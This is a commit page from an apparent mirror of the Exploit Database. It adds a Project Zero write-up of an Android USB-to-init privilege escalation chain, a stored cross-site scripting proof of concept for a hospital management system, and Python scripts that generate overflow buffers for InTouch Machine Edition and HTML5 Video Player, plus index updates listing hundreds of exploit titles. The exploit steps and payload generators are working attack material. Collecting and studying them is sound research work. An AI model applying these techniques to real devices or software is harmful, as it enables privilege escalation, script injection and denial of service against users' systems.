bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2018-09-12

Browse source 
7 changes to exploits/shellcodes

Zenmap (Nmap) 7.70 - Denial of Service (PoC)
HTML5 Video Player 1.2.5 - Denial of Service (PoC)

Zenmap (Nmap) 7.70 - Denial of Service (PoC)
InTouch Machine Edition 8.1 SP1 - 'Nombre del Tag' Buffer Overflow (SEH)
Android - 'zygote->init;' Chain from USB Privilege Escalation

Monstra CMS 3.0.4 - Arbitrary File Upload / Remote Code Execution
Monstra CMS 3.0.4 - (Authenticated) Arbitrary File Upload / Remote Code Execution

CMS Made Simple 2.2.5 - Remote Code Execution
CMS Made Simple 2.2.5 - (Authenticated) Remote Code Execution

OpenEMR < 5.0.1 - Remote Code Execution
OpenEMR < 5.0.1 - (Authenticated) Remote Code Execution

Jorani Leave Management 0.6.5 - 'startdate' SQL Injection
Jorani Leave Management 0.6.5 - (Authenticated) 'startdate' SQL Injection

OpenEMR 5.0.1.3 - Arbitrary File Actions
OpenEMR 5.0.1.3 - (Authenticated) Arbitrary File Actions

WordPress Plugin Gift Voucher 1.0.5 - 'template_id' SQL Injection
WordPress Plugin Gift Voucher 1.0.5 - (Authenticated) 'template_id' SQL Injection

Bayanno Hospital Management System 4.0 - Cross-Site Scripting
This commit is contained in:
Offensive Security 2018-09-12 05:01:53 +00:00
parent 87053f010c
commit d7fa449452
6 changed files with 185 additions and 7 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

98
exploits/android/local/45379.txt Normal file
View file

@ -0,0 +1,98 @@
After reporting https://bugs.chromium.org/p/project-zero/issues/detail?id=1583
(Android ID 80436257, CVE-2018-9445), I discovered that this issue could also
be used to inject code into the context of the zygote. Additionally, I
discovered a privilege escalation path from zygote to init; that escalation path
is why I'm filing a new bug.
Essentially, the privilege escalation from zygote to init is possible because
system/sepolicy/private/zygote.te contains the following rule:
allow zygote self:capability sys_admin;
(On the current AOSP master branch, the rule looks slightly different, but it's
still there.)
This rule allows processes in the zygote domain to use the CAP_SYS_ADMIN
capability, if they have such a capability. The zygote has the capability and
uses it, e.g. to call umount() and to install seccomp filters without setting
the NO_NEW_PRIVS flag. CAP_SYS_ADMIN is a bit of a catch-all capability: If
kernel code needs to check that the caller has superuser privileges and none of
the capability bits fit the particular case, CAP_SYS_ADMIN is usually used.
The capabilities(7) manpage has a long, but not exhaustive, list of things that
this capability permits:
http://man7.org/linux/man-pages/man7/capabilities.7.html
One of the syscalls that can be called with CAP_SYS_ADMIN and don't have
significant additional SELinux hooks is pivot_root(). This syscall can be used
to switch out the root of the current mount namespace and, as part of that,
change the root of every process in that mount namespace to the new namespace
root (unless the process already had a different root).
The exploit for this issue is in zygote_exec_target.c, starting at
"if (unshare(CLONE_NEWNS))". The attack is basically:
1. set up a new mount namespace with a root that is fully attacker-controlled
2. execute crash_dump64, causing an automatic transition to the crash_dump
domain
3. the kernel tries to load the linker for crash_dump64 from the
attacker-controlled filesystem, resulting in compromise of the crash_dump
domain
4. from the crash_dump domain, use ptrace() to inject syscalls into vold
5. from vold, set up a loop device with an attacker-controlled backing device
and mount the loop device over /sbin, without "nosuid"
6. from vold, call request_key() with a nonexistent key, causing a
usermodehelper invocation to /sbin/request-key, which is labeled as
init_exec, causing an automatic domain transition from kernel to init (and
avoiding the "neverallow kernel *:file { entrypoint execute_no_trans };"
aimed at stopping exploits using usermodehelpers)
7. code execution in the init domain
Note that this is only one of multiple possible escalation paths; for example,
I think that you could also enable swap on an attacker-controlled file, then
modify the swapped-out data to effectively corrupt the memory of any userspace
process that hasn't explicitly locked all of its memory into RAM.
In order to get into the zygote in the first place, I have to trigger
CVE-2018-9445 twice:
1. Use the bug to mount a "public volume" with a FAT filesystem over /data/misc.
2. Trigger the bug again with a "private volume" with a dm-crypt-protected
ext4 filesystem that will be mounted over /data. To decrypt the volume, a key
from /data/misc/vold/ is used.
3. Cause system_server to crash in order to trigger a zygote reboot. For this,
the following exception is targeted:
*** FATAL EXCEPTION IN SYSTEM PROCESS: NetworkStats
java.lang.NullPointerException: Attempt to get length of null array
at com.android.internal.util.FileRotator.getActiveName(FileRotator.java:309)
at com.android.internal.util.FileRotator.rewriteActive(FileRotator.java:183)
at com.android.server.net.NetworkStatsRecorder.forcePersistLocked(NetworkStatsRecorder.java:300)
at com.android.server.net.NetworkStatsRecorder.maybePersistLocked(NetworkStatsRecorder.java:286)
at com.android.server.net.NetworkStatsService.performPollLocked(NetworkStatsService.java:1194)
at com.android.server.net.NetworkStatsService.performPoll(NetworkStatsService.java:1151)
at com.android.server.net.NetworkStatsService.-wrap3(Unknown Source:0)
at com.android.server.net.NetworkStatsService$HandlerCallback.handleMessage(NetworkStatsService.java:1495)
at android.os.Handler.dispatchMessage(Handler.java:102)
at android.os.Looper.loop(Looper.java:164)
at android.os.HandlerThread.run(HandlerThread.java:65)
This exception can be triggered by sending >=2MiB (mPersistThresholdBytes) of
network traffic to the device, then either waiting for the next periodic
refresh of network stats or changing the state of a network interface.
4. The rebooting zygote64 does dlopen() on
/data/dalvik-cache/arm64/system@framework@boot.oat, resulting in code
execution in the zygote64. (For the zygote64 to get to this point, it's
sufficient to symlink
/data/dalvik-cache/arm64/system@framework@boot.{art,vdex} to their
counterparts on /system, even though that code isn't relocated properly.)
I have attached an exploit for the full chain, with usage instructions in USAGE.
WARNING: As always, this exploit is intended to be used only on research devices that don't store user data. This specific exploit is known to sometimes cause data corruption.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/45379.zip

23
exploits/php/webapps/45375.txt Normal file
View file

@ -0,0 +1,23 @@
# Exploit Title: Bayanno Hospital Management System 4.0 - Cross-Site Scripting
# Date: 2018-09-05
# Software Link: https://codecanyon.net/item/bayanno-hospital-management-system/5814621
# Exploit Author: Gokhan Sagoglu
# Vendor Homepage:: http://creativeitem.com/
# Version: v4.0
# Live Demo: http://creativeitem.com/demo/bayanno/index.php?home
# Category: webapps
# 1. Description
# Due to improper user input management and lack of output encoding, unauthenticated users are able
# to inject malicious code via making an appointment. Malicious code runs on admin panel.
# 2. PoC
- To make an appointment go to: /bayanno/index.php?home/appointment
- Select “New Patient”.
- Type <script>alert(1)</script> as name.
- Fill the other fields with proper values.
- Click on “Book Now” button.
- Go to admin panel and login as admin: /bayanno/index.php?login
- To view patients go to: /bayanno/index.php?admin/patient
- Malicious script will run.

25
exploits/windows_x86-64/local/45378.py Executable file
View file

@ -0,0 +1,25 @@
# Exploit Title: InTouch Machine Edition 8.1 SP1 - 'Nombre del Tag' Buffer Overflow (SEH)
# Discovery by: Luis Martinez
# Discovery Date: 2018-09-10
# Vendor Homepage: https://on.wonderware.com/
# Software Link: https://on.wonderware.com/intouch-machine-edition
# Tested Version: 8.1 SP1
# Vulnerability Type: Local Buffer Overflow (SEH Unicode)
# Tested on OS: Windows 10 Pro x64 en
# Steps to Produce the Local Buffer Overflow (SEH Unicode):
# 1.- Run python code: InTouch_Machine_Edition_8.1.py
# 2.- Open InTouch_Machine_Edition_8.1.txt and copy content to clipboard
# 3.- Open ITME v8.1 InTouch Machine Edition
# 4.- Inicio
# 5.- Paste ClipBoard on "Nombre del Tag"
#!/usr/bin/env python
nSEH = "\x42\x42"
SEH = "\x43\x43"
buffer = "\x41" * 1042 + nSEH + SEH
f = open ("InTouch_Machine_Edition_8.1.txt", "w")
f.write(buffer)
f.close()

0
exploits/windows_x86/local/45357.txt → exploits/windows_x86/dos/45357.txt
View file

28
exploits/windows_x86/dos/45376.py Executable file
View file

@ -0,0 +1,28 @@
# Exploit Title: HTML5 Video Player 1.2.5 - Denial of Service (PoC)
# Date: 2018-09-07
# Exploit Author: T3jv1l
# Vendor Homepage: http://www.html5videoplayer.net/download.html
# Software: http://www.html5videoplayer.net/html5videoplayer-setup.exe
# Contact: https://twitter.com/T3jv1l
# Version: HTML5 Video Player V.1.2.5
# Tested on: Windows 7 SP1 x86
# PoC:
# 1. Download and install the setup file
# 2. A file "Evil.txt" will be created
# 3. Click Help > Register... in tool bar
# 4. Copy the contents of the file (poc.txt) and paste in the Registration Name field
# 5. Click Activate and BOOMMMM !!!!
#!/usr/bin/python
buffer = "\x41" * 4000
payload = buffer
try:
f=open("poc.txt","w")
print "[+] Creating %s bytes payload..." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"

18
files_exploits.csv
View file

@ -6095,6 +6095,8 @@ id,file,description,date,author,type,platform,port
45320,exploits/windows/dos/45320.py,"Microsoft Windows Explorer Out-of-Bound Read - Denial of Service (PoC)",2018-09-03,Ghaaf,dos,windows,
45321,exploits/ios/dos/45321.py,"Trend Micro Virtual Mobile Infrastructure 5.5.1336 - 'Server address' Denial of Service (PoC)",2018-09-03,"Luis Martínez",dos,ios,
45324,exploits/windows/dos/45324.py,"Wikipedia 12.0 - Denial of Service (PoC)",2018-09-03,0xB9,dos,windows,
45357,exploits/windows_x86/dos/45357.txt,"Zenmap (Nmap) 7.70 - Denial of Service (PoC)",2018-09-10,"Gionathan Reale",dos,windows_x86,
45376,exploits/windows_x86/dos/45376.py,"HTML5 Video Player 1.2.5 - Denial of Service (PoC)",2018-09-11,T3jv1l,dos,windows_x86,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -9945,9 +9947,10 @@ id,file,description,date,author,type,platform,port
45354,exploits/windows/local/45354.txt,"Microsoft Baseline Security Analyzer 2.3 - XML External Entity Injection",2018-09-10,hyp3rlinx,local,windows,
45355,exploits/windows_x86/local/45355.py,"Flash Slideshow Maker Professional 5.20 - Buffer Overflow (SEH)",2018-09-10,"Shubham Singh",local,windows_x86,
45356,exploits/windows_x86/local/45356.py,"Any Sound Recorder 2.93 - Denial of Service (PoC)",2018-09-10,T3jv1l,local,windows_x86,
45357,exploits/windows_x86/local/45357.txt,"Zenmap (Nmap) 7.70 - Denial of Service (PoC)",2018-09-10,"Gionathan Reale",local,windows_x86,
45369,exploits/linux/local/45369.rb,"Ghostscript - Failed Restore Command Execution (Metasploit)",2018-09-10,Metasploit,local,linux,
45372,exploits/linux/local/45372.txt,"VirtualBox 5.2.6.r120293 - VM Escape",2018-08-28,"Reno Robert",local,linux,
45378,exploits/windows_x86-64/local/45378.py,"InTouch Machine Edition 8.1 SP1 - 'Nombre del Tag' Buffer Overflow (SEH)",2018-09-11,"Luis Martínez",local,windows_x86-64,
45379,exploits/android/local/45379.txt,"Android - 'zygote->init;' Chain from USB Privilege Escalation",2018-09-11,"Google Security Research",local,android,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -39419,7 +39422,7 @@ id,file,description,date,author,type,platform,port
43343,exploits/cgi/webapps/43343.py,"ITGuard-Manager 0.0.0.1 - Remote Code Execution",2017-12-15,"Nassim Asrir",webapps,cgi,
43346,exploits/php/webapps/43346.txt,"Movie Guide 2.0 - SQL Injection",2017-12-15,"Ihsan Sencan",webapps,php,80
43347,exploits/php/webapps/43347.txt,"Ciuis CRM 1.0.7 - SQL Injection",2017-12-18,"Zahid Abbasi",webapps,php,
43348,exploits/php/webapps/43348.txt,"Monstra CMS 3.0.4 - Arbitrary File Upload / Remote Code Execution",2017-12-18,"Ishaq Mohammed",webapps,php,
43348,exploits/php/webapps/43348.txt,"Monstra CMS 3.0.4 - (Authenticated) Arbitrary File Upload / Remote Code Execution",2017-12-18,"Ishaq Mohammed",webapps,php,
43349,exploits/php/webapps/43349.txt,"Cells Blog 3.5 - 'bgid' / 'fmid' / 'fnid' SQL Injection",2017-12-18,"Ihsan Sencan",webapps,php,
44158,exploits/php/webapps/44158.txt,"Joomla! Component CW Tags 2.0.6 - SQL Injection",2018-02-22,"Ihsan Sencan",webapps,php,
44159,exploits/php/webapps/44159.txt,"Joomla! Component Proclaim 9.1.1 - Backup File Download",2018-02-22,"Ihsan Sencan",webapps,php,
@ -39800,7 +39803,7 @@ id,file,description,date,author,type,platform,port
44964,exploits/php/webapps/44964.txt,"Dolibarr ERP/CRM < 7.0.3 - PHP Code Injection",2018-07-02,om3rcitak,webapps,php,80
44973,exploits/lua/webapps/44973.py,"ntop-ng < 3.4.180617 - Authentication Bypass",2018-07-03,"Ioannis Profetis",webapps,lua,
44975,exploits/java/webapps/44975.py,"ManageEngine Exchange Reporter Plus < Build 5311 - Remote Code Execution",2018-07-04,"Kacper Szurek",webapps,java,8181
44976,exploits/php/webapps/44976.py,"CMS Made Simple 2.2.5 - Remote Code Execution",2018-07-04,"Mustafa Hasan",webapps,php,
44976,exploits/php/webapps/44976.py,"CMS Made Simple 2.2.5 - (Authenticated) Remote Code Execution",2018-07-04,"Mustafa Hasan",webapps,php,
44977,exploits/php/webapps/44977.txt,"Online Trade - Information Disclosure",2018-07-04,L0RD,webapps,php,
44978,exploits/php/webapps/44978.txt,"ShopNx - Arbitrary File Upload",2018-07-04,L0RD,webapps,php,
45014,exploits/php/webapps/45014.txt,"WAGO e!DISPLAY 7300T - Multiple Vulnerabilities",2018-07-13,"SEC Consult",webapps,php,80
@ -39813,7 +39816,7 @@ id,file,description,date,author,type,platform,port
44999,exploits/linux/webapps/44999.txt,"Elektronischer Leitz-Ordner 10 - SQL Injection",2018-07-10,"Jens Regel",webapps,linux,
45002,exploits/hardware/webapps/45002.py,"D-Link DIR601 2.02 - Credential Disclosure",2018-07-10,"Thomas Zuk",webapps,hardware,
45003,exploits/php/webapps/45003.txt,"Instagram-Clone Script 2.0 - Cross-Site Scripting",2018-07-11,L0RD,webapps,php,
45161,exploits/php/webapps/45161.py,"OpenEMR < 5.0.1 - Remote Code Execution",2018-08-07,"Cody Zacharias",webapps,php,80
45161,exploits/php/webapps/45161.py,"OpenEMR < 5.0.1 - (Authenticated) Remote Code Execution",2018-08-07,"Cody Zacharias",webapps,php,80
45007,exploits/multiple/webapps/45007.txt,"Dicoogle PACS 2.5.0 - Directory Traversal",2018-07-11,"Carlos Avila",webapps,multiple,
45065,exploits/hardware/webapps/45065.txt,"GeoVision GV-SNVR0811 - Directory Traversal",2018-07-22,"Berk Dusunur",webapps,hardware,
45030,exploits/hardware/webapps/45030.txt,"VelotiSmart WiFi B-380 Camera - Directory Traversal",2018-07-16,"Miguel Mendez Z",webapps,hardware,80
@ -39852,7 +39855,7 @@ id,file,description,date,author,type,platform,port
45090,exploits/linux/webapps/45090.txt,"Kirby CMS 2.5.12 - Cross-Site Request Forgery (Delete Page)",2018-07-26,"Zaran Shaikh",webapps,linux,
45094,exploits/linux/webapps/45094.txt,"Online Trade 1 - Information Disclosure",2018-07-27,Dhamotharan,webapps,linux,
45338,exploits/php/webapps/45338.txt,"Jorani Leave Management 0.6.5 - Cross-Site Scripting",2018-09-06,"Javier Olmedo",webapps,php,80
45340,exploits/php/webapps/45340.txt,"Jorani Leave Management 0.6.5 - 'startdate' SQL Injection",2018-09-06,"Javier Olmedo",webapps,php,80
45340,exploits/php/webapps/45340.txt,"Jorani Leave Management 0.6.5 - (Authenticated) 'startdate' SQL Injection",2018-09-06,"Javier Olmedo",webapps,php,80
45341,exploits/linux/webapps/45341.py,"Apache Roller 5.0.3 - XML External Entity Injection (File Disclosure)",2018-09-06,"Marko Jokic",webapps,linux,
45342,exploits/hardware/webapps/45342.txt,"WirelessHART Fieldgate SWG70 3.0 - Directory Traversal",2018-09-06,"Hamit CİBO",webapps,hardware,
45097,exploits/php/webapps/45097.txt,"SoftNAS Cloud < 4.0.3 - OS Command Injection",2018-07-27,"Core Security",webapps,php,
@ -39892,7 +39895,7 @@ id,file,description,date,author,type,platform,port
45196,exploits/windows/webapps/45196.rb,"Oracle GlassFish Server Open Source Edition 4.1 - Path Traversal (Metasploit)",2018-08-14,Metasploit,webapps,windows,4848
45198,exploits/linux/webapps/45198.rb,"Oracle Glassfish OSE 4.1 - Path Traversal (Metasploit)",2018-08-14,"Dhiraj Mishra",webapps,linux,
45200,exploits/cgi/webapps/45200.txt,"ASUSTOR ADM 3.1.0.RFQ3 - Remote Command Execution / SQL Injection",2018-08-15,"Kyle Lovett",webapps,cgi,8001
45202,exploits/linux/webapps/45202.txt,"OpenEMR 5.0.1.3 - Arbitrary File Actions",2018-08-16,"Joshua Fam",webapps,linux,
45202,exploits/linux/webapps/45202.txt,"OpenEMR 5.0.1.3 - (Authenticated) Arbitrary File Actions",2018-08-16,"Joshua Fam",webapps,linux,
45201,exploits/hardware/webapps/45201.txt,"ASUS-DSL N10 1.1.2.2_17 - Authentication Bypass",2018-08-15,AmnBAN,webapps,hardware,
45206,exploits/php/webapps/45206.txt,"WordPress Plugin Export Users to CSV 1.1.1 - CSV Injection",2018-08-16,"Javier Olmedo",webapps,php,
45208,exploits/php/webapps/45208.txt,"Pimcore 5.2.3 - SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery",2018-08-16,"SEC Consult",webapps,php,80
@ -39913,7 +39916,7 @@ id,file,description,date,author,type,platform,port
45252,exploits/hardware/webapps/45252.txt,"Vox TG790 ADSL Router - Cross-Site Request Forgery (Add Admin)",2018-08-24,cakes,webapps,hardware,
45253,exploits/php/webapps/45253.txt,"UltimatePOS 2.5 - Remote Code Execution",2018-08-25,"Renos Nikolaou",webapps,php,
45254,exploits/windows/webapps/45254.txt,"ManageEngine ADManager Plus 6.5.7 - HTML Injection",2018-08-25,"Ismail Tasdelen",webapps,windows,
45255,exploits/php/webapps/45255.txt,"WordPress Plugin Gift Voucher 1.0.5 - 'template_id' SQL Injection",2018-08-26,"Renos Nikolaou",webapps,php,80
45255,exploits/php/webapps/45255.txt,"WordPress Plugin Gift Voucher 1.0.5 - (Authenticated) 'template_id' SQL Injection",2018-08-26,"Renos Nikolaou",webapps,php,80
45256,exploits/windows_x86-64/webapps/45256.txt,"ManageEngine ADManager Plus 6.5.7 - Cross-Site Scripting",2018-08-26,"Ismail Tasdelen",webapps,windows_x86-64,8080
45258,exploits/php/webapps/45258.txt,"Gleez CMS 1.2.0 - Cross-Site Request Forgery (Add Admin)",2018-08-27,GunEggWang,webapps,php,443
45264,exploits/hardware/webapps/45264.txt,"RICOH MP C4504ex Printer - Cross-Site Request Forgery (Add Admin)",2018-08-27,"Ismail Tasdelen",webapps,hardware,80
@ -39944,3 +39947,4 @@ id,file,description,date,author,type,platform,port
45348,exploits/hardware/webapps/45348.txt,"QNAP Photo Station 5.7.0 - Cross-Site Scripting",2018-09-07,"Mitsuaki Shiraishi",webapps,hardware,
45351,exploits/hardware/webapps/45351.py,"LW-N605R 12.20.2.1486 - Remote Code Execution",2018-09-10,"Nassim Asrir",webapps,hardware,
45361,exploits/linux/webapps/45361.py,"RPi Cam Control < 6.4.25 - 'preview.php' Remote Command Execution",2018-09-04,"Reigning Shells",webapps,linux,
45375,exploits/php/webapps/45375.txt,"Bayanno Hospital Management System 4.0 - Cross-Site Scripting",2018-09-11,"Gokhan Sagoglu",webapps,php,

Can't render this file because it is too large.